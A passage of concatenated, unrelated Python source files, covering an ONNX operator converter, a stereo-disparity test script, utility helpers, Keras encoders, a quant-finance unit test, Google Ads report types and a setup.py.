node.inputs[2]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'group', 'value': node.attrs['group']}, {'arg_name': 'size', 'value': node.attrs['kernel_shape']}, {'arg_name': 'stride', 'value': node.attrs['strides']}, {'arg_name': 'padding', 'value': pad_shape}, {'arg_name': 'autopad', 'value': node.attrs['auto_pad']}, {'arg_name': 'dilation', 'value': node.attrs['dilations']}]} return [op] def Constant(node, tensor_dict): assert node.op_type == 'Constant' if 'value' in node.attrs: tensor = tensor_proto_to_tensor(node.attrs['value'])[1] elif 'value_float' in node.attrs: tensor = {'dtype': 'TL_FLOAT', 'dims': [1], 'data': node.attrs['value_float']} elif 'value_floats' in node.attrs: tensor = {'dtype': 'TL_FLOAT', 'dims': [len(node.attrs['value_floats'])], 'data': node.attrs['value_floats']} elif 'value_int' in node.attrs: tensor = {'dtype': 'TL_INT64', 'dims': [1], 'data': node.attrs['value_int']} elif 'value_ints' in node.attrs: tensor = {'dtype': 'TL_INT64', 'dims': [len(node.attrs['value_ints'])], 'data': node.attrs['value_ints']} else: error('Unsupported Constant attribute: %s'%node.attrs.keys()) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('create'), 'optype': 'create', 'tensors_in': [], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'dtype', 'value': tensor['dtype']}, {'arg_name': 'dims', 'value': tensor['dims']}, {'arg_name': 'data', 'value': tensor['data']}, {'arg_name': 'ran', 'value': [0, 0]}, {'arg_name': 'from_file', 'value': False}]} return [op] def Div(node, tensor_dict): assert node.op_type == 'Div' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('elew'), 'optype': 'elew', 'tensors_in': [{'arg_name': 'src1', 'name': node.inputs[0]}, {'arg_name': 'src2', 'name': node.inputs[1]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'elew_op', 'value': 'TL_DIV'}]} return [op] # Dropout treated as a Forward op def Dropout(node, tensor_dict): assert node.op_type == 'Dropout' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('forward'), 'optype': 'forward', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': []} return [op] def LeakyRelu(node, tensor_dict): assert node.op_type == 'LeakyRelu' if not 'alpha' in node.attrs: alpha = 0.01 else: alpha = node.attrs['alpha'] tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('lrelu'), 'optype': 'lrelu', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'negslope', 'value': alpha}]} return [op] def MaxPool(node, tensor_dict): assert node.op_type == 'MaxPool' if len(node.attrs['kernel_shape']) != 2: error("'%s' for node '%s' only supports 2-d tensors now"%(node.op_type, node.name)) pad_shape = handle_pads(node, tensor_dict) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, 
# TODO: do shape inference 'data': None} op = {'name': new_opname('maxpool2d'), 'optype': 'maxpool2d', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'size', 'value': node.attrs['kernel_shape']}, {'arg_name': 'stride', 'value': node.attrs['strides']}, {'arg_name': 'padding', 'value': pad_shape}, {'arg_name': 'autopad', 'value': node.attrs['auto_pad']}]} return [op] def Pow(node, tensor_dict): assert node.op_type == 'Pow' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('elew'), 'optype': 'elew', 'tensors_in': [{'arg_name': 'src1', 'name': node.inputs[0]}, {'arg_name': 'src2', 'name': node.inputs[1]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'elew_op', 'value': 'TL_POW'}]} return [op] def ReduceMax(node, tensor_dict): assert node.op_type == 'ReduceMax' if not 'axes' in node.attrs or len(node.attrs['axes']) > 1: error("'%s' for node '%s' only suppport 'axes' have one element now"%(node.op_type, node.name)) if 'keepdims' in node.attrs and node.attrs['keepdims'] == 0: error("'%s' for node '%s' only suppport 'keepdims' == 1 now"%(node.op_type, node.name)) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('maxreduce'), 'optype': 'maxreduce', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'axes', 'value': node.attrs['axes'][0]}]} return [op] def Relu(node, tensor_dict): assert node.op_type == 'Relu' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('relu'), 'optype': 'relu', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': []} return [op] def Reshape(node, tensor_dict): assert node.op_type == 'Reshape' assert node.inputs[1] in tensor_dict shape = find_shape_in_tensor_dict(tensor_dict, node.outputs[0]) if shape is not None: new_shape = shape elif tensor_dict[node.inputs[1]]['data'] is not None: new_shape = tensor_dict[node.inputs[1]]['data'] else: error("'%s' for node '%s' doesn't support dynamically supplied 'shape' tensor '%s' now"%(node.op_type, node.name, node.inputs[1])) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('reshape'), 'optype': 'reshape', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'dims', 'value': new_shape}]} return [op] def Resize(node, tensor_dict): assert node.op_type == 'Resize' if not 'mode' in node.attrs: mode = 'TL_NEAREST' elif node.attrs['mode'] == 'nearest': mode = 'TL_NEAREST' elif node.attrs['mode'] == 'linear': mode = 'TL_LINEAR' else: error("'%s' for node '%s' doesn't support 'mode' == '%s'"%(node.op_type, node.name, node.attrs['mode'])) assert node.inputs[1] in tensor_dict if tensor_dict[node.inputs[1]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'scales' tensor 
now"%(node.op_type, node.name)) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('resize'), 'optype': 'resize', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'mode', 'value': mode}, {'arg_name': 'scales', 'value': tensor_dict[node.inputs[1]]['data']}]} return [op] def Sigmoid(node, tensor_dict): assert node.op_type == 'Sigmoid' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('sigmoid'), 'optype': 'sigmoid', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': []} return [op] def Slice(node, tensor_dict): assert node.op_type == 'Slice' assert node.inputs[1] in tensor_dict assert node.inputs[2] in tensor_dict assert node.inputs[3] in tensor_dict assert node.inputs[4] in tensor_dict if tensor_dict[node.inputs[1]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'starts' tensor now"%(node.op_type, node.name)) if tensor_dict[node.inputs[2]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'ends' tensor now"%(node.op_type, node.name)) if tensor_dict[node.inputs[3]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'axes' tensor now"%(node.op_type, node.name)) if tensor_dict[node.inputs[4]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'steps' tensor now"%(node.op_type, node.name)) if len(tensor_dict[node.inputs[1]]['data']) != 1 or len(tensor_dict[node.inputs[2]]['data']) != 1 or len(tensor_dict[node.inputs[3]]['data']) != 1 or len(tensor_dict[node.inputs[4]]['data']) != 1: error("'%s' for node '%s' only support slice on one axis now"%(node.op_type, node.name)) if tensor_dict[node.inputs[4]]['data'][0] != 1: error("'%s' for node '%s' only support 'steps' == 1 now"%(node.op_type, node.name)) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('slice'), 'optype': 'slice', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'start', 'value': tensor_dict[node.inputs[1]]['data'][0]}, {'arg_name': 'axis', 'value': tensor_dict[node.inputs[3]]['data'][0]}, {'arg_name': 'len', 'value': tensor_dict[node.inputs[2]]['data'][0]-tensor_dict[node.inputs[1]]['data'][0]}]} return [op] def Softmax(node, tensor_dict): assert node.op_type == 'Softmax' if not 'axis' in node.attrs: axis = 1 else: axis = node.attrs['axis'] tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('softmax'), 'optype': 'softmax', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'axis', 'value': axis}]} return [op] def Transpose(node, tensor_dict): assert node.op_type == 'Transpose' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape 
inference 'data': None} op = {'name': new_opname('transpose'), 'optype': 'transpose', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'axes', 'value': node.attrs['perm']}]} return [op] def Upsample(node, tensor_dict): assert node.op_type == 'Upsample' if not 'mode' in node.attrs: mode = 'TL_NEAREST' elif node.attrs['mode'] == 'nearest': mode = 'TL_NEAREST' elif node.attrs['mode'] == 'linear': mode = 'TL_LINEAR' else: error("'%s' for node '%s' doesn't support 'mode' == '%s'"%(node.op_type, node.name, node.attrs['mode'])) assert node.inputs[1] in tensor_dict if tensor_dict[node.inputs[1]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'scales' tensor now"%(node.op_type, node.name)) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('resize'), 'optype': 'resize', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'mode', 'value': mode}, {'arg_name': 'scales', 'value': tensor_dict[node.inputs[1]]['data']}]} return [op] onnx_to_ln_op_converters = { 'Add': Add, 'ArgMax': ArgMax, 'AveragePool': AveragePool, 'BatchNormalization': BatchNormalization, 'Concat': Concat, 'Constant': Constant, 'Conv': Conv, 'Div': Div, 'Dropout': Dropout, 'LeakyRelu': LeakyRelu, 'MaxPool': MaxPool, 'Pow': Pow, 'ReduceMax': ReduceMax, 'Relu': Relu, 'Reshape': Reshape, 'Resize': Resize, 'Sigmoid': Sigmoid, 'Slice': Slice, 'Softmax': Softmax, 'Transpose': Transpose, 'Upsample': Upsample, } def unsupported_node(node, tensor_dict): error("Unimplemented ONNX operator type '%s' for node '%s'"%(node.op_type, node.name)) def onnx_node_to_ln_op(onnx_node, tensor_dict): return onnx_to_ln_op_converters.get(onnx_node.op_type, unsupported_node)(onnx_node, tensor_dict)
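# --- usage sketch (illustrative addition, not part of the original module) ---
# new_opname() numbers operator names per optype, and new_create_op() wraps a
# constant tensor (in the dict layout produced by tensor_proto_to_tensor) into
# a 'create' op. The weight tensor below is made up for illustration.
if __name__ == '__main__':
    weight = {'name': 'conv1.weight', 'dtype': 'TL_FLOAT',
              'dims': [2, 2], 'data': [1.0, 2.0, 3.0, 4.0]}
    op = new_create_op(weight)
    print(op['name'])            # e.g. 'create0' on the first call
    print(new_opname('conv2d'))  # 'conv2d0', then 'conv2d1', ...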
11569765
from __future__ import print_function
import argparse
import os
import random
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.autograd import Variable
import torch.nn.functional as F
import skimage
import skimage.io
import numpy as np
import time
import math
from dataloader import dataloader_kitti141 as DL
from models import *
from path import Path

parser = argparse.ArgumentParser(description='LidarStereoNet')
parser.add_argument('--maxdisp', type=int, default=192,
                    help='maximum disparity')
parser.add_argument('--model', default='stackhourglass',
                    help='select model')
parser.add_argument('--datatype', default='kitti',
                    help='datapath')
parser.add_argument('--datapath', default='./data',
                    help='datapath')
parser.add_argument('--loadmodel', default=None,
                    help='load model')
parser.add_argument('--savemodel', default='./results/',
                    help='save model')
parser.add_argument('--no-cuda', action='store_true', default=False,
                    help='enables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
                    help='random seed (default: 1)')
parser.add_argument('--gpu', default="1", type=str,
                    help='Which GPU to use? (default: 1)')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()

save_path = Path(args.savemodel)
save_path.makedirs_p()

torch.manual_seed(args.seed)
if args.cuda:
    torch.cuda.manual_seed(args.seed)

left_test, right_test, displ_test, dispr_test = DL.test_Kitti141(args.datapath)

test_dataset = DL.TestLoader(False, left_test, right_test, displ_test, dispr_test)
TestImgLoader = DataLoader(dataset=test_dataset, batch_size=1, num_workers=1,
                           shuffle=False, drop_last=False)

if args.model == 'stackhourglass':
    model = stackhourglass(args.maxdisp)
else:
    print('no model')

if args.cuda:
    model = nn.DataParallel(model)
    model.cuda()

if args.loadmodel is not None and os.path.isfile(args.loadmodel):
    print("=> loading checkpoint '{}'".format(args.loadmodel))
    checkpoint = torch.load(args.loadmodel)
    model.load_state_dict(checkpoint['state_dict'], strict=True)
else:
    print("=> no checkpoint found at '{}'".format(args.loadmodel))

print('Number of model parameters: {}'.format(
    sum([p.data.nelement() for p in model.parameters()])))

optimizer = optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999))


def test(imgL, imgR, disp_L, disp_R):
    model.eval()

    # Pad images such that the dimensions are multiples of 32
    shape = imgL.shape
    height_new = int(np.ceil(shape[2] / 32.) * 32)
    width_new = int(np.ceil(shape[3] / 32.) * 32)
    padding = (0, width_new - shape[3], 0, height_new - shape[2])
    imgL = F.pad(imgL, padding, "constant", 0)
    imgR = F.pad(imgR, padding, "constant", 0)
    disp_L = F.pad(disp_L, padding, "constant", 0)
    disp_R = F.pad(disp_R, padding, "constant", 0)

    imgL = Variable(torch.FloatTensor(imgL))
    imgR = Variable(torch.FloatTensor(imgR))
    disp_L = Variable(torch.FloatTensor(disp_L))
    disp_R = Variable(torch.FloatTensor(disp_R))

    if args.cuda:
        imgL, imgR, disp_L, disp_R = imgL.cuda(), imgR.cuda(), disp_L.cuda(), disp_R.cuda()

    with torch.no_grad():
        outputl3, outputr3 = model(imgL, imgR, disp_L, disp_R)

    # Crop output back to the original shape
    outputl3 = outputl3[:, :shape[2], :shape[3]]
    outputr3 = outputr3[:, :shape[2], :shape[3]]

    pred_disp = outputl3.data.cpu()
    output = torch.squeeze(pred_disp, 1)[:, :, :]
    torch.cuda.empty_cache()
    return output


def main():
    # TEST ##
    num_samples = len(left_test)
    for batch_idx, (imgL, imgR, dispL, dispR) in enumerate(TestImgLoader):
        output = test(imgL, imgR, dispL, dispR)
        # save prediction
        disp_est = torch.squeeze(output).numpy()
        skimage.io.imsave(args.savemodel + 'images/' + left_test[batch_idx][-13:],
                          (disp_est * 256).astype('uint16'))
        print('Inference Image: %s' % (left_test[batch_idx][-13:]))


if __name__ == '__main__':
    main()
11569778
import hashlib
import string
from typing import (
    Any,
    Dict,
    Hashable,
    Iterable,
    Iterator,
    List,
    Mapping,
    Optional,
    Tuple,
    TypeVar,
)

T = TypeVar('T')
K = TypeVar('K')
V = TypeVar('V')
H = TypeVar('H', bound=Hashable)


# Based on: https://stackoverflow.com/a/2704866
# Perhaps one day: https://peps.python.org/pep-0603/
class FrozenDict(Mapping[K, V]):
    _dict: Dict[K, V]
    _hash: Optional[int]

    def __init__(self, *args, **kwargs):
        self._dict = dict(*args, **kwargs)
        self._hash = None

    def __iter__(self) -> Iterator[K]:
        return iter(self._dict)

    def __len__(self) -> int:
        return len(self._dict)

    def __getitem__(self, key: K) -> V:
        return self._dict[key]

    def __hash__(self) -> int:
        if self._hash is None:
            h = 0
            for pair in self.items():
                h ^= hash(pair)
            self._hash = h
        return self._hash

    def __str__(self) -> str:
        return f'FrozenDict({str(self._dict)})'

    def __repr__(self) -> str:
        return f'FrozenDict({repr(self._dict)})'


def merge_with(f, d1: Mapping, d2: Mapping) -> Dict:
    res = dict(d1)
    for k, v2 in d2.items():
        if k in d1:
            v1 = d1[k]
            res[k] = f(v1, v2)
        else:
            res[k] = v2
    return res


def find_common_items(l1: Iterable[T], l2: Iterable[T]) -> Tuple[List[T], List[T], List[T]]:
    common = []
    for i in l1:
        if i in l2:
            common.append(i)
    newL1 = []
    newL2 = []
    for i in l1:
        if i not in common:
            newL1.append(i)
    for i in l2:
        if i not in common:
            newL2.append(i)
    return (common, newL1, newL2)


def intersperse(iterable: Iterable[T], delimiter: T) -> Iterator[T]:
    it = iter(iterable)
    try:
        yield next(it)
    except StopIteration:
        return
    for x in it:
        yield delimiter
        yield x


def unique(iterable: Iterable[H]) -> Iterator[H]:
    elems = set()
    for elem in iterable:
        if elem in elems:
            continue
        else:
            elems.add(elem)
            yield elem


def nonempty_str(x: Any) -> str:
    if x is None:
        raise ValueError('Expected nonempty string, found: null.')
    if type(x) is not str:
        raise TypeError(f'Expected nonempty string, found: {type(x)}')
    if x == '':
        raise ValueError("Expected nonempty string, found: ''")
    return x


# Hashes

def hash_str(x: Any) -> str:
    hash = hashlib.sha256()
    hash.update(str(x).encode('utf-8'))
    return str(hash.hexdigest())


def is_hash(x: Any) -> bool:
    # NB! currently only sha256 in hexdec form is detected
    # 2b9e b7c5 441e 9f7e 97f9 a4e5 fc04 a0f7 9f62 c8e9 605a ad1e 02db e8de 3c21 0422
    # 1    2    3    4    5    6    7    8    9    10   11   12   13   14   15   16
    return type(x) is str and len(x) == 64 and all(c in string.hexdigits for c in x)


def shorten_hash(h: str, leftChars=6, rightChars=6) -> str:
    left = h[0:leftChars] if leftChars > 0 else ''
    right = h[-rightChars:] if rightChars > 0 else ''
    return left + ".." + right


def shorten_hashes(value: Any, leftChars=6, rightChars=6) -> Any:
    result: Any = None
    if is_hash(value):
        result = shorten_hash(value, leftChars, rightChars)
    elif type(value) is tuple:
        result = tuple([shorten_hashes(item) for item in value])
    elif type(value) is list:
        result = [shorten_hashes(v) for v in value]
    elif type(value) is dict:
        result = {}
        for (k, v) in value.items():
            result[shorten_hashes(k)] = shorten_hashes(v)
    elif type(value) is set:
        result = set()
        for item in value:
            result.add(shorten_hashes(item))
    else:
        result = value
    return result


def compare_short_hashes(lhs: str, rhs: str) -> bool:
    left, right = lhs.split('.'), rhs.split('.')
    (l0, l1, r0, r1) = (left[0].upper(), left[-1].upper(), right[0].upper(), right[-1].upper())
    return (l0.startswith(r0) or r0.startswith(l0)) and (l1.endswith(r1) or r1.endswith(l1))
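# --- usage sketch (illustrative addition, not part of the original file) ---
# FrozenDict is hashable (Mapping supplies __eq__, so equal contents hash and
# compare equal), which makes it usable as a dict key; merge_with resolves key
# collisions with a caller-supplied function.
if __name__ == '__main__':
    fd = FrozenDict({'a': 1, 'b': 2})
    cache = {fd: 'cached-result'}  # a plain dict key here would raise TypeError
    print(cache[FrozenDict({'b': 2, 'a': 1})])  # -> 'cached-result'
    print(merge_with(lambda x, y: x + y, {'a': 1}, {'a': 2, 'b': 3}))  # {'a': 3, 'b': 3}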
11569779
from torch import nn

magic_number = -1.0E+10


def run_lstm(module, H):
    H = nn.utils.rnn.pack_sequence(H, enforce_sorted=False)
    Y, _ = module(H)
    Y, lengths = nn.utils.rnn.pad_packed_sequence(Y, batch_first=True)
    Y = [Y[i, :length] for i, length in enumerate(lengths)]
    return Y
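# --- usage sketch (illustrative addition, not part of the original file) ---
# run_lstm() packs a list of variable-length sequences, runs them through a
# recurrent module, and unpads back to a per-sequence list. The sizes below
# are assumptions chosen for illustration.
import torch

if __name__ == '__main__':
    lstm = nn.LSTM(input_size=8, hidden_size=16)
    seqs = [torch.randn(5, 8), torch.randn(3, 8)]  # lengths 5 and 3
    outs = run_lstm(lstm, seqs)
    print([tuple(o.shape) for o in outs])  # [(5, 16), (3, 16)]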
11569806
from functools import reduce
from math import gcd


def lcm(a, b):
    return a * b // gcd(a, b)


n, m = map(int, input().strip().split(' '))
a = list(map(int, input().strip().split(' ')))
b = list(map(int, input().strip().split(' ')))

count = 0
a_lcm = reduce(lcm, a)
b_gcd = reduce(gcd, b)

# count multiples of lcm(a) that divide gcd(b)
multiple = a_lcm
while multiple <= b_gcd:
    if b_gcd % multiple == 0:
        count = count + 1
    multiple = multiple + a_lcm

print(count)
11569813
import datetime

from quantdsl.domain.model.market_simulation import MarketSimulation
from quantdsl.domain.model.simulated_price import make_simulated_price_id, SimulatedPrice
from quantdsl.defaults import DEFAULT_PRICE_PROCESS_NAME
from quantdsl.tests.test_application import ApplicationTestCase


class TestMarketSimulation(ApplicationTestCase):

    NUMBER_MARKETS = 2
    NUMBER_DAYS = 5
    PATH_COUNT = 200

    def test_register_market_simulation(self):
        # Set up the market calibration.
        price_process_name = DEFAULT_PRICE_PROCESS_NAME
        calibration_params = {
            'market': ['#1', '#2'],
            'sigma': [0.1, 0.2],
            'curve': {
                '#1': [
                    ('2011-1-1', 10),
                ],
                '#2': [
                    ('2011-1-1', 20),
                ],
            },
            'rho': [
                [1.0, 0.5],
                [0.5, 1.0],
            ],
        }
        market_calibration = self.app.register_market_calibration(price_process_name, calibration_params)

        # Create a market simulation for a list of markets and fixing times.
        commodity_names = ['#%d' % (i + 1) for i in range(self.NUMBER_MARKETS)]
        fixing_dates = [datetime.datetime(2011, 1, 1) + datetime.timedelta(days=i)
                        for i in range(self.NUMBER_DAYS)]
        observation_date = fixing_dates[0]
        simulation_requirements = []
        for commodity_name in commodity_names:
            for fixing_date in fixing_dates:
                simulation_requirements.append((commodity_name, fixing_date, fixing_date))
        path_count = self.PATH_COUNT

        market_simulation = self.app.register_market_simulation(
            market_calibration_id=market_calibration.id,
            requirements=simulation_requirements,
            observation_date=observation_date,
            path_count=path_count,
            interest_rate=2.5,
        )

        assert isinstance(market_simulation, MarketSimulation)
        assert market_simulation.id
        market_simulation = self.app.market_simulation_repo[market_simulation.id]
        assert isinstance(market_simulation, MarketSimulation)
        self.assertEqual(market_simulation.market_calibration_id, market_calibration.id)
        # self.assertEqual(market_simulation.requirements[0], ['#1', '#2'])
        # self.assertEqual(market_simulation.fixing_dates, [datetime.date(2011, 1, i) for i in range(2, 6)])
        self.assertEqual(market_simulation.observation_date, datetime.datetime(2011, 1, 1))
        self.assertEqual(market_simulation.path_count, self.PATH_COUNT)

        # Check there are simulated prices for all the requirements.
        for requirement in simulation_requirements:
            commodity_name = requirement[0]
            fixing_date = requirement[1]
            delivery_date = requirement[2]
            simulated_price_id = make_simulated_price_id(
                market_simulation.id, commodity_name, fixing_date, delivery_date)
            simulated_price = self.app.simulated_price_repo[simulated_price_id]
            self.assertIsInstance(simulated_price, SimulatedPrice)
            self.assertTrue(simulated_price.value.mean())
11569823
from omni_reports.client.fields import AttributeReportField, MetricReportField, SegmentReportField
from omni_reports.google_reports.base import GoogleAdsReportType

BOOLEAN_VALUES = {
    'true': True,
    'false': False
}


def to_bool(val):
    return BOOLEAN_VALUES.get(val)


class GoogleAdsAccountPerformanceReportType(GoogleAdsReportType):
    REPORT_TYPE = "ACCOUNT_PERFORMANCE_REPORT"

    account_id = AttributeReportField(target_name="ExternalCustomerId", display_name="Customer ID")
    date = SegmentReportField(target_name="Date", display_name="Day")
    cost = MetricReportField(target_name="Cost", display_name="Cost",
                             map=lambda val: float(val) / 1e6)
    currency = AttributeReportField(target_name="AccountCurrencyCode", display_name="Currency")
    conversions = MetricReportField(target_name="Conversions", display_name="Conversions", type=float)
    cost_per_conversion = MetricReportField(target_name="CostPerConversion", display_name="Cost / conv.",
                                            map=lambda val: float(val) / 1e6)


class GoogleAdsKeywordsPerformanceReportType(GoogleAdsReportType):
    REPORT_TYPE = "KEYWORDS_PERFORMANCE_REPORT"

    id = AttributeReportField(target_name="Id", display_name="Keyword ID")
    criteria = AttributeReportField(target_name="Criteria", display_name="Keyword")
    ad_group_id = AttributeReportField(target_name="AdGroupId", display_name="Ad group ID")
    ad_group_name = AttributeReportField(target_name="AdGroupName", display_name="Ad group")
    ad_group_status = AttributeReportField(target_name="AdGroupStatus", display_name="Ad group state")
    campaign_id = AttributeReportField(target_name="CampaignId", display_name="Campaign ID")
    campaign_name = AttributeReportField(target_name="CampaignName", display_name="Campaign")
    campaign_status = AttributeReportField(target_name="CampaignStatus", display_name="Campaign state")
    is_negative = AttributeReportField(target_name="IsNegative", display_name="Is negative", map=to_bool)
    has_quality_score = AttributeReportField(target_name="HasQualityScore", display_name="Has Quality Score",
                                             map=to_bool)
    quality_score = AttributeReportField(target_name="QualityScore", display_name="Quality score")
    cost = MetricReportField(target_name="Cost", display_name="Cost")
11569824
from keras.models import Model
from utils.layers import Conv1D, _activation
from keras.layers import Input, Concatenate, Reshape, Dense, Add,\
    Activation, Flatten, Dropout, BatchNormalization,\
    RepeatVector, LocallyConnected1D, ZeroPadding1D,\
    GRU
from keras.layers.pooling import GlobalAveragePooling1D


def fc_encoder(seqlen, latent_dim, alphabet_size=21,
               encoder_hidden=[250, 250, 250], encoder_dropout=[0.7, 0., 0.],
               activation='relu', n_conditions=0):
    x = Input(shape=(seqlen, alphabet_size,))
    h = Flatten()(x)
    if n_conditions > 0:
        conditions = Input((n_conditions,))
        h = Concatenate()([h, conditions])
    for n_hid, drop in zip(encoder_hidden, encoder_dropout):
        h = Dense(n_hid, activation=activation)(h)
        if drop > 0:
            h = Dropout(drop)(h)
    # Variational parameters
    z_mean = Dense(latent_dim)(h)
    z_var = Dense(latent_dim, activation='softplus')(h)
    if n_conditions > 0:
        E = Model([x, conditions], [z_mean, z_var])
    else:
        E = Model(x, [z_mean, z_var])
    return E


def cnn_encoder(original_dim, latent_dim, nchar=21, num_filters=21,
                kernel_size=2, BN=True, activation='prelu', dropout=None,
                log_transform_var=False, max_filters=10000, n_conv=5,
                n_conditions=0, n_dense_cond=6, cond_concat_dim=None):
    # n_conditions defaults to 0 so the `n_conditions > 0` checks below are valid
    x = Input((original_dim, nchar))
    h = x
    for i in range(n_conv):
        h = Conv1D(min(num_filters * (2**i), max_filters), kernel_size,
                   activation=activation, strides=1 if i == 0 else 2,
                   use_bias=not BN, BN=BN, dropout=dropout)(h)
    h = Flatten()(h)
    if n_conditions > 0:
        conditions, h_cond = cond_mlp(
            h._keras_shape[-1] if cond_concat_dim is None else cond_concat_dim,
            activation=activation, n_conditions=n_conditions, h=n_dense_cond)
        h = Concatenate()([h, h_cond])
    z_mean = Dense(latent_dim)(h)
    z_var = Dense(latent_dim, activation='softplus')(h)
    if n_conditions > 0:
        E = Model([x, conditions], [z_mean, z_var])
    else:
        E = Model(x, [z_mean, z_var])
    return E


def cond_mlp(out_dim, n_layers=2, h=6, n_conditions=3, activation='prelu'):
    conditions = Input((n_conditions,))
    h_cond = conditions
    for i in range(n_layers):
        h_cond = _activation(activation, BN=False)(Dense(h)(h_cond))
    h_cond = Dense(out_dim)(h_cond)
    h_cond = _activation(activation, BN=False)(h_cond)
    return conditions, h_cond
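# --- usage sketch (illustrative addition, not part of the original file) ---
# Building the fully connected encoder and querying its variational outputs
# for a batch of (pseudo) one-hot sequences; the shapes are assumptions.
if __name__ == '__main__':
    import numpy as np

    E = fc_encoder(seqlen=50, latent_dim=16, alphabet_size=21)
    x = np.random.rand(4, 50, 21).astype('float32')
    z_mean, z_var = E.predict(x)
    print(z_mean.shape, z_var.shape)  # (4, 16) (4, 16)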
11569830
from setuptools import setup


def readme():
    with open('README.rst') as f:
        return f.read()


setup(name='scatnetgpu',
      version='1.1',
      description='Scattering Network for Python and CUDA',
      long_description=readme(),
      url='http://github.com/oinegue/scatnetgpu',
      author='<NAME>',
      author_email='<EMAIL>',
      license='MIT',
      packages=['scatnetgpu'],
      install_requires=[
          'pycuda>=2016.1.2',
          'scikit-cuda>=0.5.1',
          'numpy',
          'scipy'
      ],
      include_package_data=True,
      zip_safe=False)
11569854
import re


# Remove invisible control characters from a string
